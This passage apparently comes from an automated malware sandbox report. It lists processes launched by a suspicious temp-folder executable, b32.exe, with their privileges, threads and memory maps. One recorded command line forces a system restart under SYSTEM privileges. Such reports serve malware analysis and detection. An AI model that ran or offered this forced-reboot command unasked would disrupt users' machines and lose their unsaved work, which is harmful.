Monitor Duration 00:00:39
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x7e8
Parent PID 0xad4 (c:\users\5p5nrg~1\appdata\local\temp\b32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 660
0x 9B4
0x 9B0
0x 9A8
0x 994
0x 9BC
0x AAC
0x AB0
0x A94
0x ACC
0x A90
0x A9C
0x AA0
0x AA4
0x 220
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
iexplore.exe.mui 0x000d0000 0x000d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00100000 0x00100fff Memory Mapped File Readable False False False -
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x00150000 0x0015ffff Memory Mapped File Readable, Writable True False False -
index.dat 0x00160000 0x00167fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00170000 0x0017ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable True False False -
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003a0000 0x003a0000 0x00527fff Pagefile Backed Memory Readable True False False -
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x005cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x00750fff Pagefile Backed Memory Readable True False False -
private_0x0000000000760000 0x00760000 0x0077ffff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x00880000 0x00b4efff Memory Mapped File Readable False False False -
private_0x0000000000b50000 0x00b50000 0x00c4ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000c50000 0x00c50000 0x00cbdfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000ce0000 0x00ce0000 0x00d1ffff Private Memory Readable, Writable True False False -
private_0x0000000000d20000 0x00d20000 0x00d5ffff Private Memory Readable, Writable True False False -
private_0x0000000000d70000 0x00d70000 0x00daffff Private Memory Readable, Writable True False False -
private_0x0000000000db0000 0x00db0000 0x00deffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000df0000 0x00df0000 0x00e4cfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000e50000 0x00e50000 0x00e8ffff Private Memory Readable, Writable True False False -
private_0x0000000000f10000 0x00f10000 0x00f1ffff Private Memory Readable, Writable True False False -
private_0x0000000000f40000 0x00f40000 0x0103ffff Private Memory Readable, Writable True False False -
private_0x0000000001070000 0x01070000 0x010affff Private Memory Readable, Writable True False False -
iexplore.exe 0x010c0000 0x01165fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000001170000 0x01170000 0x0256ffff Pagefile Backed Memory Readable True False False -
private_0x00000000025a0000 0x025a0000 0x025dffff Private Memory Readable, Writable True False False -
private_0x0000000002610000 0x02610000 0x0270ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002710000 0x02710000 0x027eefff Pagefile Backed Memory Readable True False False -
private_0x0000000002830000 0x02830000 0x0286ffff Private Memory Readable, Writable True False False -
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False -
private_0x00000000028d0000 0x028d0000 0x029cffff Private Memory Readable, Writable True False False -
private_0x0000000002a00000 0x02a00000 0x02afffff Private Memory Readable, Writable True False False -
private_0x0000000002b30000 0x02b30000 0x02c2ffff Private Memory Readable, Writable True False False -
private_0x0000000002cd0000 0x02cd0000 0x02dcffff Private Memory Readable, Writable True False False -
private_0x0000000002dd0000 0x02dd0000 0x02e0ffff Private Memory Readable, Writable True False False -
private_0x0000000002e30000 0x02e30000 0x02e6ffff Private Memory Readable, Writable True False False -
private_0x0000000002eb0000 0x02eb0000 0x02faffff Private Memory Readable, Writable True False False -
private_0x0000000002fb0000 0x02fb0000 0x030affff Private Memory Readable, Writable True False False -
private_0x00000000030d0000 0x030d0000 0x031cffff Private Memory Readable, Writable True False False -
private_0x00000000031f0000 0x031f0000 0x0322ffff Private Memory Readable, Writable True False False -
private_0x00000000032c0000 0x032c0000 0x032cffff Private Memory Readable, Writable True False False -
private_0x0000000003390000 0x03390000 0x0348ffff Private Memory Readable, Writable True False False -
private_0x00000000035d0000 0x035d0000 0x036cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000036d0000 0x036d0000 0x03ac2fff Pagefile Backed Memory Readable True False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
ieframe.dll 0x73110000 0x73b8ffff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x749f0000 0x74a22fff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x74d40000 0x74d47fff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74d50000 0x74da9fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x74e90000 0x74ecbfff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x74ed0000 0x74ed5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x74ee0000 0x74eeffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x74ef0000 0x74ef5fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74f00000 0x74f51fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74f60000 0x74f6dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74f70000 0x74faafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74fb0000 0x74fc5fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x74fd0000 0x74fdcfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x74fe0000 0x74ff4fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75000000 0x75008fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x75010000 0x75030fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75040000 0x75046fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x75050000 0x7506bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75070000 0x750b3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
msimg32.dll 0x75270000 0x75274fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x752b0000 0x752c2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x75a20000 0x75a24fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75a50000 0x75a55fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75a60000 0x75b7cfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x76240000 0x76375fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76380000 0x763b4fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x763d0000 0x763dbfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76570000 0x76664fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x767f0000 0x7686afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x77940000 0x77984fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 115 entries are omitted.
The remaining entries can be found in flog.txt.
Process #16: shutdown.exe
0 0
Information Value
ID #16
File Name c:\windows\syswow64\shutdown.exe
Command Line shutdown -r -t 60 -f
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:39
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x978
Parent PID 0x7fc (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 99C
0x 9DC
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000230000 0x00230000 0x003b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000420000 0x00420000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x0078ffff Private Memory Readable, Writable True False False -
shutdown.exe 0x00cd0000 0x00cd9fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x75720000 0x75727fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #17: ie4uinit.exe
0 0
Information Value
ID #17
File Name c:\windows\syswow64\ie4uinit.exe
Command Line "C:\Windows\SysWOW64\ie4uinit.exe" -ShowQLIcon
Initial Working Directory C:\Users\5P5NRG~1\AppData\Local\Temp\
Monitor Start Time: 00:01:45, Reason: Child Process
Unmonitor End Time: 00:02:24, Reason: Terminated by Timeout
Monitor Duration 00:00:39
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x9a4
Parent PID 0x7e8 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 9B8
0x 914
0x A80
0x A7C
0x A74
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00140000 0x00140fff Memory Mapped File Readable False False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable True False False -
private_0x00000000001b0000 0x001b0000 0x001effff Private Memory Readable, Writable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x002cefff Pagefile Backed Memory Readable True False False -
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory Readable, Writable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db 0x00310000 0x0032efff Memory Mapped File Readable True False False -
pagefile_0x0000000000330000 0x00330000 0x00330fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000360000 0x00360000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
private_0x0000000000650000 0x00650000 0x0068ffff Private Memory Readable, Writable True False False -
private_0x00000000006b0000 0x006b0000 0x006effff Private Memory Readable, Writable True False False -
private_0x00000000006f0000 0x006f0000 0x0072ffff Private Memory Readable, Writable True False False -
private_0x0000000000750000 0x00750000 0x0078ffff Private Memory Readable, Writable True False False -
private_0x00000000007c0000 0x007c0000 0x007cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000007d0000 0x007d0000 0x00957fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000960000 0x00960000 0x00ae0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000ba0000 0x00ba0000 0x00bdffff Private Memory Readable, Writable True False False -
private_0x0000000000c20000 0x00c20000 0x00c5ffff Private Memory Readable, Writable True False False -
private_0x0000000000c60000 0x00c60000 0x00c9ffff Private Memory Readable, Writable True False False -
ie4uinit.exe 0x00d90000 0x00dbdfff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000dc0000 0x00dc0000 0x021bffff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000021c0000 0x021c0000 0x02502fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000002510000 0x02510000 0x02902fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02910000 0x02bdefff Memory Mapped File Readable False False False -
netutils.dll 0x74940000 0x74948fff Memory Mapped File Readable, Writable, Executable False False False -
ntshrui.dll 0x74950000 0x749bffff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x749f0000 0x749f9fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x74a00000 0x74a0afff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x74a10000 0x74a28fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x74e90000 0x74ecbfff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x75000000 0x75008fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x75010000 0x75030fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x750c0000 0x750cafff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x750d0000 0x7526dfff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x75270000 0x75278fff Memory Mapped File Readable, Writable, Executable False False False -
advpack.dll 0x75280000 0x752adfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x752d0000 0x7534ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x75360000 0x75367fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x75370000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x753d0000 0x7540efff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x75780000 0x75874fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75980000 0x7598bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75990000 0x759effff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75a30000 0x75a48fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75bb0000 0x75bf5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x75c00000 0x75c26fff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75c30000 0x75dccfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x75dd0000 0x75fcafff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fd0000 0x760dffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x760e0000 0x7617ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x76180000 0x761d6fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x763c0000 0x763c9fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x763e0000 0x764dffff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x764e0000 0x7656efff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x76670000 0x7671bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76720000 0x767ebfff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x76870000 0x76881fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76890000 0x76912fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76920000 0x77569fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x77570000 0x775cffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x775d0000 0x776bffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x776c0000 0x7781bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x77820000 0x778affff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x77940000 0x77984fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x77990000 0x77a2cfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000077a30000 0x77a30000 0x77b4efff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077b50000 0x77b50000 0x77c49fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77c50000 0x77df8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77e30000 0x77faffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #18: iexplore.exe
0 0
